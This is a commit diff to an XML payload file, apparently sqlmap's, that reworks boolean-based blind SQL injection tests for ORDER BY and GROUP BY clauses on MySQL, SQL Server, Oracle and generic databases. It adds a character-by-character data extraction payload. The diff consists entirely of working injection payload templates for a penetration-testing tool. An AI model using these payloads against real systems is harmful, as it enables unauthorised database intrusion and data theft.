On the way to get full support for injection on ORDER BY and GROUP BY clauses
parent
47f2d22181
commit
df4cb1a601
|
@ -436,7 +436,7 @@ Formats:
|
||||||
|
|
||||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -444,10 +444,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
@ -456,7 +456,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -464,10 +464,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
@ -475,7 +475,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -483,10 +483,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
@ -494,7 +494,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -502,10 +502,10 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
|
@ -515,7 +515,7 @@ Formats:
|
||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -523,26 +523,26 @@ Formats:
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
@ -551,7 +551,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -559,10 +559,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>MySQL</dbms>
|
<dbms>MySQL</dbms>
|
||||||
|
@ -570,7 +570,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -578,10 +578,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
@ -589,7 +589,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle boolean-based blind - ORDER BY clause</title>
|
<title>Oracle boolean-based blind - ORDER BY clause (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -597,10 +597,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
|
@ -610,7 +610,7 @@ Formats:
|
||||||
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
<!-- TODO: check against Microsoft Access, Firebird and SAP MaxDB -->
|
||||||
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
<!-- NOTE: this does not behave as expected against SQLite, need to find another payload (TODO) -->
|
||||||
<test>
|
<test>
|
||||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||||
<stype>1</stype>
|
<stype>1</stype>
|
||||||
<level>4</level>
|
<level>4</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
@ -618,10 +618,10 @@ Formats:
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
<epayload></epayload>
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))</comparison>
|
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||||
</response>
|
</response>
|
||||||
</test>
|
</test>
|
||||||
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
|
|